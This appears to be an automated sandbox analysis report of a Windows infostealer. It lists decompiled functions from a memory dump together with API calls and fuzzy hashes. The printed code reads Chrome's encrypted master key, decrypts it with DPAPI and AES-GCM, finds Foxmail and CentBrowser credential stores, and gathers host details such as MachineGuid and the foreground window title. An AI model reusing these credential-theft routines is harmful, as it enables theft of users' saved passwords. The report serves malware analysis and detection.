Part of subcall function 0040CC54: CryptStringToBinaryW.CRYPT32(00000000,00000000,00000001,00000000,?,00000000,00000000), ref: 0040CC73
Part of subcall function 0040CC54: LocalAlloc.KERNEL32(00000040,?,?,0040CBC6,?,00000000,?,00000000,?), ref: 0040CC81
Part of subcall function 0040CC54: CryptStringToBinaryW.CRYPT32(00000000,00000000,00000001,00000000,?,00000000,00000000), ref: 0040CC97
Part of subcall function 0040CC54: LocalFree.KERNEL32(?,?,0040CBC6,?,00000000,?,00000000,?), ref: 0040CCA5

LocalFree.KERNEL32(?,00000000,-0000003A,00000000,?), ref: 0040CA6C

Part of subcall function 0040CA78: GetLastError.KERNEL32 ref: 0040CADE

LocalFree.KERNEL32(?), ref: 0040CA65

Part of subcall function 0040CCB4: BCryptOpenAlgorithmProvider.BCRYPT(00000020,AES,00000000,00000000,?,00000000,?,?,?,0040CA5F,?), ref: 0040CCD1
Part of subcall function 0040CCB4: BCryptSetProperty.BCRYPT(00000020,ChainingMode,ChainingModeGCM,00000020,00000000,?,0040CA5F,?), ref: 0040CCEA
Part of subcall function 0040CCB4: BCryptGenerateSymmetricKey.BCRYPT(00000020,0040CA5F,00000000,00000000,?,00000020,00000000,?,0040CA5F,?), ref: 0040CCFF

Strings

DPAPI, xrefs: 0040CA18
, xrefs: 0040CA4B

Memory Dump Source

Source File: 00000004.00000002.554668873.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: Crypt$Local$Free$BinaryString$AlgorithmAllocErrorGenerateLastOpenPropertyProviderSymmetric
String ID: $DPAPI
API String ID: 379455710-1819349886
Opcode ID: 6835efd5ed3bdd2a8124e963475c95309ed1e43e10672f90f0e0167f11a4b9f4
Instruction ID: 04bf41e7008add8f4a3ae58a75aeb1b04db966ebd79b9b8d2087252f069c6e3c
Opcode Fuzzy Hash: 6835efd5ed3bdd2a8124e963475c95309ed1e43e10672f90f0e0167f11a4b9f4
Instruction Fuzzy Hash: CE015E72A0010DFBDF10EBA1DD85EDEB778AB44705F118276E804F2184E734AB85DB98

Uniqueness

Uniqueness Score: -1.00%

Function 00411E21, Relevance: 6.0, APIs: 4, Instructions: 48
fileCOMMON

Download Yara Rule

C-Code - Quality: 91%

			E00411E21(CHAR* __ecx, signed int* __edx) {
				long _v8;
				void* _t5;
				long _t6;
				signed int _t7;
				void* _t11;
				signed int* _t18;
				void* _t22;

				_push(__ecx);
				_t18 = __edx;
				_t11 = E00401085(0x400000);
				_v8 = 0;
				_t5 = CreateFileA(__ecx, 0x80000000, 0, 0, 3, 0x80, 0); // executed
				_t22 = _t5;
				if(_t22 == 0xffffffff) {
					 *_t18 =  *_t18 & 0x00000000;
				}
				_t6 = GetFileSize(_t22, 0);
				 *_t18 = _t6;
				_t7 = ReadFile(_t22, _t11, _t6,  &_v8, 0); // executed
				if(_t7 == 0) {
					 *_t18 =  *_t18 & _t7;
				}
				FindCloseChangeNotification(_t22); // executed
				return _t11;
			}

0x00411e24
0x00411e2d
0x00411e37
0x00411e4b
0x00411e4e
0x00411e54
0x00411e59
0x00411e5b
0x00411e5b
0x00411e61
0x00411e6c
0x00411e72
0x00411e7a
0x00411e7c
0x00411e7c
0x00411e7f
0x00411e8b

APIs

Part of subcall function 00401085: GetProcessHeap.KERNEL32(00000000,?,00411E36,00400000,?,?,00000000,?,?,0041349D), ref: 0040108B
Part of subcall function 00401085: RtlAllocateHeap.NTDLL(00000000,?,?,00000000,?,?,0041349D), ref: 00401092

CreateFileA.KERNEL32(?,80000000,00000000,00000000,00000003,00000080,00000000,?,?,00000000,?,?,0041349D), ref: 00411E4E
GetFileSize.KERNEL32(00000000,00000000,?,?,00000000,?,?,0041349D), ref: 00411E61
ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,?,00000000,?,?,0041349D), ref: 00411E72
FindCloseChangeNotification.KERNEL32(00000000,?,?,00000000,?,?,0041349D), ref: 00411E7F

Memory Dump Source

Source File: 00000004.00000002.554668873.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: File$Heap$AllocateChangeCloseCreateFindNotificationProcessReadSize
String ID:
API String ID: 2557216016-0
Opcode ID: 9cf9e135969d03e2678d2257f49f57b78742e56c31193f2db14f718b692a2705
Instruction ID: fb363df85bf2d9b02997f9a86bc51ba312390ffbc8cf422f0c30554d498563d0
Opcode Fuzzy Hash: 9cf9e135969d03e2678d2257f49f57b78742e56c31193f2db14f718b692a2705
Instruction Fuzzy Hash: 14F044B17112107FF3205B65AC09FFB769CDB55765F204135FA51E31D0E7B45D4086A8

Uniqueness

Uniqueness Score: -1.00%

Function 004047EA, Relevance: 6.0, APIs: 4, Instructions: 46
COMMON

Download Yara Rule

C-Code - Quality: 83%

			E004047EA(intOrPtr _a4) {
				char _v8;
				struct tagLASTINPUTINFO _v16;
				signed int _v36;
				char _v40;
				short _v552;
				struct HWND__* _t25;

				_v16.cbSize = 8;
				GetLastInputInfo( &_v16);
				_t23 = GetTickCount() - _v16.dwTime;
				_t25 = GetForegroundWindow(); // executed
				GetWindowTextW(_t25,  &_v552, 0x100);
				E004035E5( &_v8,  &_v552); // executed
				_t12 =  &_v36;
				_v36 = _v36 & 0x00000000;
				asm("xorps xmm0, xmm0");
				_v40 = 0x15;
				asm("movups [ebp-0x1c], xmm0");
				E00403679(L00403761(L00403740( &_v40, (GetTickCount() - _v16.dwTime) / 0x3e8), _t23 % 0x3e8,  &_v8),  *_t12, _a4);
				E00403665( &_v40);
				L00405EA5(_v8);
				return _a4;
			}

0x004047f7
0x004047ff
0x0040480b
0x00404819
0x0040482c
0x0040483c
0x00404844
0x00404844
0x0040484c
0x0040484f
0x0040485a
0x0040486c
0x00404874
0x0040487c
0x00404886

APIs

GetLastInputInfo.USER32 ref: 004047FF
GetTickCount.KERNEL32 ref: 00404805
GetForegroundWindow.USER32 ref: 00404819
GetWindowTextW.USER32 ref: 0040482C

Part of subcall function 004035E5: lstrlenW.KERNEL32(00411E02,00000000,?,00411E02,00000000,00000000,h\HA,00000000), ref: 004035EE
Part of subcall function 004035E5: lstrlenW.KERNEL32(00411E02,?,00411E02,00000000,00000000,h\HA,00000000), ref: 00403605
Part of subcall function 004035E5: KiUserExceptionDispatcher.NTDLL ref: 00403620

Part of subcall function 00405EA5: VirtualFree.KERNELBASE(?,00000000,00008000,00405C2A,00000000,?,004110EE,?,?,004136B9), ref: 00405EAD

Memory Dump Source

Source File: 00000004.00000002.554668873.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: Windowlstrlen$CountDispatcherExceptionForegroundFreeInfoInputLastTextTickUserVirtual
String ID:
API String ID: 3825627427-0
Opcode ID: 53ec264987bf02e716b056fae7ea2858fb4bbd28a0d565d81be937b390888146
Instruction ID: 9232618d2a95307947b37617596d42c9c757323c2ecaddd148e12c6a0cc08536
Opcode Fuzzy Hash: 53ec264987bf02e716b056fae7ea2858fb4bbd28a0d565d81be937b390888146
Instruction Fuzzy Hash: F51130B1D00108ABCB04EFB5DD49ADDBBBDEF98305F008169A402B3190EF786B44CB54

Uniqueness

Uniqueness Score: -1.00%

Function 0040FBFC, Relevance: 6.0, APIs: 4, Instructions: 37
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040FBFC() {
				void* _v8;
				long _v12;
				void _v16;
				long _t21;
				void* _t22;

				_t22 = 0;
				_v8 = 0;
				if(OpenProcessToken(GetCurrentProcess(), 8,  &_v8) != 0) {
					_t21 = 4;
					_v12 = _t21;
					GetTokenInformation(_v8, 0x14,  &_v16, _t21,  &_v12); // executed
					_t22 =  !=  ? _v16 : 0;
				}
				if(_v8 != 0) {
					FindCloseChangeNotification(_v8); // executed
				}
				return 0 | _t22 != 0x00000000;
			}

0x0040fc06
0x0040fc0b
0x0040fc1d
0x0040fc21
0x0040fc25
0x0040fc33
0x0040fc3b
0x0040fc3b
0x0040fc43
0x0040fc48
0x0040fc48
0x0040fc57

APIs

GetCurrentProcess.KERNEL32(00000008,00000000,74B60770,00000000,74B60770,00000000,?,?,?,?,00413589,?), ref: 0040FC0E
OpenProcessToken.ADVAPI32(00000000,?,?,?,?,00413589,?), ref: 0040FC15
GetTokenInformation.KERNELBASE(?,00000014(TokenIntegrityLevel),?,00000004,?,?,?,?,?,00413589,?), ref: 0040FC33
FindCloseChangeNotification.KERNEL32(00000000), ref: 0040FC48

Memory Dump Source

Source File: 00000004.00000002.554668873.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: ProcessToken$ChangeCloseCurrentFindInformationNotificationOpen
String ID:
API String ID: 2406157124-0
Opcode ID: eaaaab6a576d5f26a59590c60b8529498a75a5c6e6a24e5c90d3c3744da6f4b8
Instruction ID: 6fb553a7aa8bf3ab883ff7ebc2a7e6bb744be305b0f627636a4dbb5773bb8036
Opcode Fuzzy Hash: eaaaab6a576d5f26a59590c60b8529498a75a5c6e6a24e5c90d3c3744da6f4b8
Instruction Fuzzy Hash: 69F0F972D00218FBEB159BA1DD0ABDEBBB8EF48741F118075EA01F6190D7749F48DA94

Uniqueness

Uniqueness Score: -1.00%

Function 046A4060, Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 155COMMON

Download Yara Rule

Strings

database corruption at line %d of [%.10s], xrefs: 046A407F, 046A40AA, 046A4169
ed759d5a9edb3bba5f48f243df47be29e3fe8cd7, xrefs: 046A4075, 046A40A0, 046A415F

Memory Dump Source

Source File: 00000004.00000003.336122914.0000000004690000.00000040.00000001.sdmp, Offset: 04690000, based on PE: true

Similarity

API ID:
String ID: database corruption at line %d of [%.10s]$ed759d5a9edb3bba5f48f243df47be29e3fe8cd7
API String ID: 0-1231421067
Opcode ID: 1e83a25a4a6f63544550a6e1868de10899d6479f7cdc3ab7c62f9a34ac56bc05
Instruction ID: 09843c105846a4c0419eb8fb91410edf18304e3d4b46384a3eaf6e08cb90cd63
Opcode Fuzzy Hash: 1e83a25a4a6f63544550a6e1868de10899d6479f7cdc3ab7c62f9a34ac56bc05
Instruction Fuzzy Hash: B35193B17006109BDB209F58DC85B6673E5EB90768F144569E9188F382FBB1FC618FD1

Uniqueness

Uniqueness Score: -1.00%

Function 0040FCB8, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 65
registryCOMMON

Download Yara Rule

C-Code - Quality: 32%

			E0040FCB8(intOrPtr* __ecx, void* __edx) {
				void* _v8;
				char _v12;
				char _v16;
				int _v20;
				char _v24;
				int* _t18;
				short** _t23;
				void* _t31;
				void* _t48;
				int* _t50;

				_t48 = __edx;
				_t35 = __ecx;
				_t50 = __ecx;
				_v8 = 0;
				_v24 = 0;
				_v20 = 0;
				 *((intOrPtr*)(__ecx)) = 0;
				 *((intOrPtr*)(__ecx + 4)) = 0;
				if( *0x54e094 != 0) {
					_t18 = 0x54e090;
				} else {
					_t23 = E004035E5( &_v12, L"SOFTWARE\\Microsoft\\Cryptography"); // executed
					RegOpenKeyExW(0x80000002,  *_t23, 0, 0x101,  &_v8); // executed
					asm("sbb esi, esi");
					L00405EA5(_v12);
					if(1 != 0) {
						_t31 = E004035E5( &_v12, L"MachineGuid"); // executed
						E00410FC3(_t48, _t31,  &_v24); // executed
						L00405EA5(_v12);
						E00410FAE( &_v8);
					}
					L00402E93(_t50, E0040607A( &_v16,  &_v24));
					E00403036( &_v16);
					_t35 = 0x54e090;
					_t18 = _t50;
				}
				L00402E93(_t35, _t18);
				E00403036( &_v24);
				E00410FAE( &_v8);
				return _t50;
			}

0x0040fcb8
0x0040fcb8
0x0040fcc2
0x0040fcc4
0x0040fcc7
0x0040fcca
0x0040fccd
0x0040fccf
0x0040fcd8
0x0040fd61
0x0040fcde
0x0040fce6
0x0040fcfc
0x0040fd07
0x0040fd09
0x0040fd11
0x0040fd1f
0x0040fd28
0x0040fd30
0x0040fd38
0x0040fd38
0x0040fd4b
0x0040fd53
0x0040fd58
0x0040fd5d
0x0040fd5d
0x0040fd67
0x0040fd6f
0x0040fd77
0x0040fd81

APIs

Part of subcall function 004035E5: lstrlenW.KERNEL32(00411E02,00000000,?,00411E02,00000000,00000000,h\HA,00000000), ref: 004035EE
Part of subcall function 004035E5: lstrlenW.KERNEL32(00411E02,?,00411E02,00000000,00000000,h\HA,00000000), ref: 00403605
Part of subcall function 004035E5: KiUserExceptionDispatcher.NTDLL ref: 00403620

RegOpenKeyExW.KERNEL32(80000002,00000000,00000000,00000101,?,SOFTWARE\Microsoft\Cryptography,?,?,?,?,00000000,?,?,?), ref: 0040FCFC

Part of subcall function 00405EA5: VirtualFree.KERNELBASE(?,00000000,00008000,00405C2A,00000000,?,004110EE,?,?,004136B9), ref: 00405EAD

Part of subcall function 00410FC3: RegQueryValueExW.KERNEL32(?,74B60770,00000000,74B60770,00000000,00000000,?,00000000,00413589,?,?,?,004115B2,?,?,80000001), ref: 00410FE6
Part of subcall function 00410FC3: RegQueryValueExW.KERNEL32(?,74B60770,00000000,74B60770,00000000,00000000,?,004115B2,?,?,80000001,?,000F003F,00000000,00000000,Software\Microsoft\Windows\CurrentVersion\Run\), ref: 0041100A

Part of subcall function 00410FAE: RegCloseKey.KERNEL32(?,?,0041112D,?,?,004136B9), ref: 00410FB8

Strings

SOFTWARE\Microsoft\Cryptography, xrefs: 0040FCDE
MachineGuid, xrefs: 0040FD17

Memory Dump Source

Source File: 00000004.00000002.554668873.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: QueryValuelstrlen$CloseDispatcherExceptionFreeOpenUserVirtual
String ID: MachineGuid$SOFTWARE\Microsoft\Cryptography
API String ID: 1654648907-1211650757
Opcode ID: 8e7d1f230f777e34e5c0f46a9be389ebb4408b7f66579b10a9a79a8e47e4be4d
Instruction ID: ee41a6e26054bff040f486a2fe8a50efbaf53c62fe2c998e29d90c35aae1452c
Opcode Fuzzy Hash: 8e7d1f230f777e34e5c0f46a9be389ebb4408b7f66579b10a9a79a8e47e4be4d
Instruction Fuzzy Hash: 7B115C70A00118ABCB24EFA5C9568EEBB78AF54708B10047FB006B31D1EBB85F45CB98

Uniqueness

Uniqueness Score: -1.00%

Function 00405A10, Relevance: 4.7, APIs: 1, Strings: 2, Instructions: 156
sleepCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00405A10(char __ecx, void* __edx, void* __eflags) {
				char _v8;
				char _v12;
				char _v16;
				char _v24;
				intOrPtr _v48;
				intOrPtr _v52;
				intOrPtr _v56;
				char _v76;
				char _v100;
				char _v108;
				char _v148;
				void* _t86;
				void* _t97;
				void* _t101;
				void* _t105;
				void* _t109;
				intOrPtr* _t130;
				char _t179;
				void* _t180;
				void* _t181;
				void* _t182;
				void* _t183;
				void* _t184;
				void* _t185;
				void* _t186;
				intOrPtr _t188;
				intOrPtr _t189;
				intOrPtr _t190;
				intOrPtr _t191;
				intOrPtr* _t192;
				void* _t193;

				_t193 = __eflags;
				_t179 = __ecx;
				_v8 = __ecx;
				Sleep(0x1f4); // executed
				E0041044F( &_v100, _t193);
				E00410346( &_v100, E00411CA2( &_v100)); // executed
				_t86 = E004033BF( &_v12, ".bss"); // executed
				E004102B9( &_v100,  &_v148, _t86); // executed
				L00405EA5(_v12);
				E0040304C( &_v16,  &_v108);
				L00402E93(_t179 + 0x48,  &_v16);
				E00403036( &_v16);
				E0040595E(_t179,  &_v24);
				_t130 = _v24;
				_t188 =  *_t130;
				_t97 = E00411DC0(_t130 + 4, _t188); // executed
				E00403437(_t179 + 0x10, _t97); // executed
				L00405EA5(_v12);
				_t19 =  &_v8; // 0x413578
				_t20 = _t188 + 4; // 0x74b60774
				_t180 = _t20;
				 *((intOrPtr*)( *_t19 + 0x14)) =  *((intOrPtr*)(_t130 + _t180));
				_t189 =  *((intOrPtr*)(_t130 + _t180 + 4));
				_t181 = _t180 + 8;
				_t101 = E00411DC0(_t130 + _t181, _t189);
				_t27 =  &_v8; // 0x413578
				E00403437( *_t27 + 0x28, _t101);
				L00405EA5(_v12);
				_t30 =  &_v8; // 0x413578
				_t182 = _t181 + _t189;
				 *((intOrPtr*)( *_t30 + 0x18)) =  *((char*)(_t130 + _t182));
				_t190 =  *((intOrPtr*)(_t130 + _t182 + 1));
				_t183 = _t182 + 5;
				_t105 = E00411DC0(_t130 + _t183, _t190);
				_t37 =  &_v8; // 0x413578
				E00403437( *_t37 + 0x1c, _t105);
				L00405EA5(_v12);
				_t40 =  &_v8; // 0x413578
				_t184 = _t183 + _t190;
				 *((intOrPtr*)( *_t40 + 0x20)) =  *((char*)(_t130 + _t184));
				_t191 =  *((intOrPtr*)(_t130 + _t184 + 1));
				_t185 = _t184 + 5;
				_t109 = E00411DC0(_t130 + _t185, _t191);
				_t47 =  &_v8; // 0x413578
				E00403437( *_t47 + 0x24, _t109);
				L00405EA5(_v12);
				_t186 = _t185 + _t191;
				_t51 =  &_v8; // 0x413578
				_t192 =  *_t51;
				 *((intOrPtr*)(_t192 + 0x2c)) =  *((intOrPtr*)(_t130 + _t186));
				 *((intOrPtr*)(_t192 + 0x34)) =  *((char*)(_t130 + _t186 + 4));
				 *((intOrPtr*)(_t192 + 0x38)) =  *((char*)(_t130 + _t186 + 5));
				 *((intOrPtr*)(_t192 + 0x3c)) =  *((char*)(_t130 + _t186 + 6));
				 *((intOrPtr*)(_t192 + 0x40)) =  *((char*)(_t130 + _t186 + 7));
				 *((intOrPtr*)(_t192 + 0x44)) =  *((char*)(_t130 + _t186 + 8));
				E00411DC0(_t130 + 4 + _t186 + 9,  *((intOrPtr*)(_t130 + _t186 + 9))); // executed
				_t71 =  &_v8; // 0x413578
				E00403437(_t192 + 0x30, _t71);
				_t73 =  &_v8; // 0x413578
				 *_t192 = 1;
				 *((intOrPtr*)(_t192 + 4)) = 1;
				L00405EA5( *_t73);
				E00403036( &_v24);
				E00403036( &_v108);
				_t169 = _v56;
				if(_v56 != 0) {
					E00401E71(_t169, _t169);
				}
				_v56 = 0;
				_v48 = 0;
				_v52 = 0;
				E00403036( &_v76);
				return L0040FEED( &_v100, 0);
			}

0x00405a10
0x00405a1c
0x00405a23
0x00405a26
0x00405a2f
0x00405a3d
0x00405a4a
0x00405a5a
0x00405a62
0x00405a6e
0x00405a7a
0x00405a82
0x00405a8d
0x00405a92
0x00405a98
0x00405a9e
0x00405aa8
0x00405ab0
0x00405ab5
0x00405ab8
0x00405ab8
0x00405abe
0x00405ac4
0x00405ac8
0x00405acf
0x00405ad5
0x00405adc
0x00405ae4
0x00405ae9
0x00405aec
0x00405af2
0x00405af8
0x00405afc
0x00405b03
0x00405b09
0x00405b10
0x00405b18
0x00405b1d
0x00405b20
0x00405b26
0x00405b2c
0x00405b30
0x00405b37
0x00405b3d
0x00405b44
0x00405b4c
0x00405b51
0x00405b56
0x00405b56
0x00405b5f
0x00405b67
0x00405b6f
0x00405b77
0x00405b7f
0x00405b8a
0x00405b92
0x00405b98
0x00405b9f
0x00405ba4
0x00405baa
0x00405bac
0x00405baf
0x00405bb7
0x00405bbf
0x00405bc4
0x00405bc9
0x00405bcc
0x00405bcc
0x00405bd6
0x00405bd9
0x00405bdc
0x00405bdf
0x00405bf0

APIs

Sleep.KERNEL32(000001F4,00000000,74B60770,00000000), ref: 00405A26

Part of subcall function 004033BF: lstrlenA.KERNEL32(?,74B60770,?,00405A4F,h\HA,00000000), ref: 004033C8
Part of subcall function 004033BF: lstrlenA.KERNEL32(?,?,00405A4F,h\HA,00000000), ref: 004033D5
Part of subcall function 004033BF: lstrcpyA.KERNEL32(00000000,?,?,00405A4F,h\HA,00000000), ref: 004033E8

Part of subcall function 00405EA5: VirtualFree.KERNELBASE(?,00000000,00008000,00405C2A,00000000,?,004110EE,?,?,004136B9), ref: 00405EAD

Part of subcall function 00403437: lstrcpyW.KERNEL32 ref: 0040345C

Strings

x5A, xrefs: 00405AB5, 00405AD5, 00405AE9, 00405B09, 00405B1D, 00405B3D, 00405B56, 00405B59, 00405B98, 00405BA4, 00405B9B
h\HA, xrefs: 00405A42

Memory Dump Source

Source File: 00000004.00000002.554668873.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: lstrcpylstrlen$FreeSleepVirtual
String ID: h\HA$x5A
API String ID: 277671435-3533286509
Opcode ID: 984fbbdb40c4cd8a45e5d051506d2d0b959dce5bdaba65feeb055fb7b8885a67
Instruction ID: 145e88e604e1605710be084c022a5ad4a2708462876eee3a1dbc8bb2c1383742
Opcode Fuzzy Hash: 984fbbdb40c4cd8a45e5d051506d2d0b959dce5bdaba65feeb055fb7b8885a67
Instruction Fuzzy Hash: A8517475900149AFCB14EFA1D8D18EEBBB9AF44308B1001BED456AB296DF34BB45CF94

Uniqueness

Uniqueness Score: -1.00%

Function 0040CED9, Relevance: 4.6, APIs: 2, Strings: 1, Instructions: 54
COMMON

Download Yara Rule

C-Code - Quality: 82%

			E0040CED9(intOrPtr _a12, intOrPtr _a16) {
				void* _v8;
				char _v12;
				void* __ecx;
				void* _t9;
				void* _t15;
				void* _t16;
				WCHAR* _t17;
				intOrPtr _t23;
				void* _t29;
				void* _t31;
				void* _t33;

				_push(_t17);
				_push(_t17);
				_t31 = 0;
				_t9 = E0040CBA8(_t17,  &_v8,  &_v12); // executed
				if(_t9 != 0) {
					_t29 = E0040CB67(_v8, _v12);
					if(_t29 != 0) {
						_t33 = E004010D5(_t29, L"\"os_crypt\":{\"encrypted_key\":\"");
						if(_t33 == 0) {
							L5:
							_t31 = 0;
						} else {
							_t34 = _t33 + 0x3a;
							_t15 = E004010D5(_t33 + 0x3a, L"\"}");
							_pop(_t23);
							if(_t15 == 0) {
								goto L5;
							} else {
								_t16 = E0040C9F2(_t34, _t23, _a12, _a16); // executed
								_t31 = _t16;
							}
						}
						LocalFree(_t29);
					}
					LocalFree(_v8);
				}
				return _t31;
			}

0x0040cedc
0x0040cedd
0x0040cee2
0x0040cee9
0x0040cef1
0x0040cefe
0x0040cf02
0x0040cf0f
0x0040cf15
0x0040cf40
0x0040cf40
0x0040cf17
0x0040cf17
0x0040cf20
0x0040cf26
0x0040cf29
0x00000000
0x0040cf2b
0x0040cf34
0x0040cf3c
0x0040cf3c
0x0040cf29
0x0040cf43
0x0040cf43
0x0040cf4c
0x0040cf4c
0x0040cf57

APIs

Part of subcall function 0040CB67: LocalAlloc.KERNEL32(00000040,00000000,00000000,00000000,?,0040CEFE,00000000,00000000,00000000,00000000,?,0040C66B,?,?,00000000,?), ref: 0040CB84

LocalFree.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,0040C66B,?,?,00000000,?), ref: 0040CF43

Part of subcall function 0040C9F2: LocalFree.KERNEL32(?), ref: 0040CA65
Part of subcall function 0040C9F2: LocalFree.KERNEL32(?,00000000,-0000003A,00000000,?), ref: 0040CA6C

LocalFree.KERNEL32(?,00000000,00000000,00000000,00000000,?,0040C66B,?,?,00000000,?), ref: 0040CF4C

Strings

"os_crypt":{"encrypted_key":", xrefs: 0040CF04

Memory Dump Source

Source File: 00000004.00000002.554668873.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: Local$Free$Alloc
String ID: "os_crypt":{"encrypted_key":"
API String ID: 3098330729-81358813
Opcode ID: b8efc3eb222198d6abbb037dd4e4835766a37bb0a4a2cdb6474b195bfec7dee3
Instruction ID: 8220b18802889d287f70f14c05928f4b850563417370cd3784220fbd1e8e12c4
Opcode Fuzzy Hash: b8efc3eb222198d6abbb037dd4e4835766a37bb0a4a2cdb6474b195bfec7dee3
Instruction Fuzzy Hash: A601D433900116B7C721EB56EC46C9F7779DB84764721027AF901B22D0EE39EE0096DD

Uniqueness

Uniqueness Score: -1.00%

Function 004035E5, Relevance: 4.5, APIs: 3, Instructions: 23
stringCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E004035E5(struct _EXCEPTION_RECORD* __ecx, WCHAR* _a4) {
				struct _EXCEPTION_RECORD* _t18;

				_t18 = __ecx;
				 *_t18 = E00405E22(2 + lstrlenW(_a4) * 2);
				L00405F31( *_t18, 2 + lstrlenW(_a4) * 2);
				KiUserExceptionDispatcher( *_t18, _a4); // executed
				return _t18;
			}

0x004035ec
0x00403603
0x00403615
0x00403620
0x0040362a

APIs

lstrlenW.KERNEL32(00411E02,00000000,?,00411E02,00000000,00000000,h\HA,00000000), ref: 004035EE

Part of subcall function 00405E22: VirtualAlloc.KERNEL32(00000000,00000000,00003000,00000004,?,?,004033E2,?,00405A4F,h\HA,00000000), ref: 00405E30

lstrlenW.KERNEL32(00411E02,?,00411E02,00000000,00000000,h\HA,00000000), ref: 00403605
KiUserExceptionDispatcher.NTDLL ref: 00403620

Memory Dump Source

Source File: 00000004.00000002.554668873.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: lstrlen$AllocDispatcherExceptionUserVirtual
String ID:
API String ID: 4104320610-0
Opcode ID: 02971af01053db0ff295063def34fd9b5ebe1a4fa3f09955848a3ad00732b028
Instruction ID: 304e6bb68b50d36fee59bb492d35bee8f843ffc9f4e8ff9d079b21cbdc615461
Opcode Fuzzy Hash: 02971af01053db0ff295063def34fd9b5ebe1a4fa3f09955848a3ad00732b028
Instruction Fuzzy Hash: 27E09A3910020AABCF006F61EC0DD8E3F69EBC8360B00843AF90183230CF7A99A0CF54

Uniqueness

Uniqueness Score: -1.00%

Function 00409F71, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 23
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00409F71(void* __eflags) {
				void* __ecx;
				void* _t1;
				intOrPtr _t6;
				intOrPtr _t10;

				_t10 = _t6; // executed
				_t1 = E00409D9A(_t6); // executed
				if(_t1 != 0) {
					PathCombineA(0x4196a8, 0x4197b0, "Storage");
					E00409DF6(_t10, _t6);
					E00409ADF(_t10, 0x4196a8);
				}
				return 0;
			}

0x00409f74
0x00409f76
0x00409f7d
0x00409f8f
0x00409f98
0x00409fa0
0x00409fa0
0x00409faa

APIs

Part of subcall function 00409D9A: RegOpenKeyExA.KERNEL32(80000001,software\Aerofox\FoxmailPreview,00000000,00020019,00000000,?,?,?,?,00409F7B,?,00000000,?,0040C401,?), ref: 00409DB5
Part of subcall function 00409D9A: RegQueryValueExA.ADVAPI32(00000000,Executable,00000000,00000000,004197B0,?,?,?,?,?,00409F7B,?,00000000,?,0040C401,?), ref: 00409DDC
Part of subcall function 00409D9A: PathRemoveFileSpecA.SHLWAPI(004197B0,?,?,?,?,00409F7B,?,00000000,?,0040C401,?,?,00000000,?,\CentBrowser\User Data\Default\Login Data,\CentBrowser\User Data\Local State), ref: 00409DE7

PathCombineA.SHLWAPI(004196A8,004197B0,Storage,?,00000000,?,0040C401,?,?,00000000,?,\CentBrowser\User Data\Default\Login Data,\CentBrowser\User Data\Local State,00000000,00000000,00000012), ref: 00409F8F

Part of subcall function 00409DF6: GetFullPathNameA.KERNEL32(004196A8,00000104,?,00000000,004196A8,?), ref: 00409E17
Part of subcall function 00409DF6: PathCombineA.SHLWAPI(?,?,00415F88), ref: 00409E36
Part of subcall function 00409DF6: FindFirstFileA.KERNEL32(?,?), ref: 00409E46
Part of subcall function 00409DF6: PathCombineA.SHLWAPI(?,004196A8,0000002E), ref: 00409E7D
Part of subcall function 00409DF6: PathCombineA.SHLWAPI(?,?,Accounts\Account.rec0), ref: 00409E8C
Part of subcall function 00409DF6: FindNextFileA.KERNEL32(00000000,?), ref: 00409EA4

Part of subcall function 00409ADF: CreateFileA.KERNEL32(?,80000000,00000007,00000000,00000003,00000000,00000000,00000000,7673C620,?), ref: 00409AFC
Part of subcall function 00409ADF: GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,00409E9C,?), ref: 00409B09
Part of subcall function 00409ADF: CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,00409E9C,?), ref: 00409B10

Strings

Storage, xrefs: 00409F7F

Memory Dump Source

Source File: 00000004.00000002.554668873.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: Path$CombineFile$Find$CloseCreateErrorFirstFullHandleLastNameNextOpenQueryRemoveSpecValue
String ID: Storage
API String ID: 4053074784-2613519016
Opcode ID: 8b3f2aff2d2b9320f8716d638162878e62411143ad30d98ad5018681bad88f91
Instruction ID: 90ce864239a6d26421dccd0f479432ee337d89f216902885841afd516cfa4519
Opcode Fuzzy Hash: 8b3f2aff2d2b9320f8716d638162878e62411143ad30d98ad5018681bad88f91
Instruction Fuzzy Hash: 10D05E723951112ACA193B2A9C269EF465E8ED2B65314007FF506F32C3DFAD8C4241AD

Uniqueness

Uniqueness Score: -1.00%

Function 0040FA1F, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 12
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040FA1F() {
				struct _MEMORYSTATUSEX _v68;

				_v68.dwLength = 0x40;
				GlobalMemoryStatusEx( &_v68); // executed
				return (_v68.ullAvailPhys << 0x00000020 | _v68.ullTotalPhys) >> 0x14;
			}

0x0040fa28
0x0040fa30
0x0040fa41

APIs

GlobalMemoryStatusEx.KERNEL32(?), ref: 0040FA30

Strings

@, xrefs: 0040FA28

Memory Dump Source

Source File: 00000004.00000002.554668873.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: GlobalMemoryStatus
String ID: @
API String ID: 1890195054-2766056989
Opcode ID: 370f0e7cddf05cc77d7b802b52d7d942dbbf3519159c4e0b9a854eaa535263bc
Instruction ID: c8ce8853fc757c7b42fa9ad2f970e4aced1d41c025462103f660ba38515b70ab
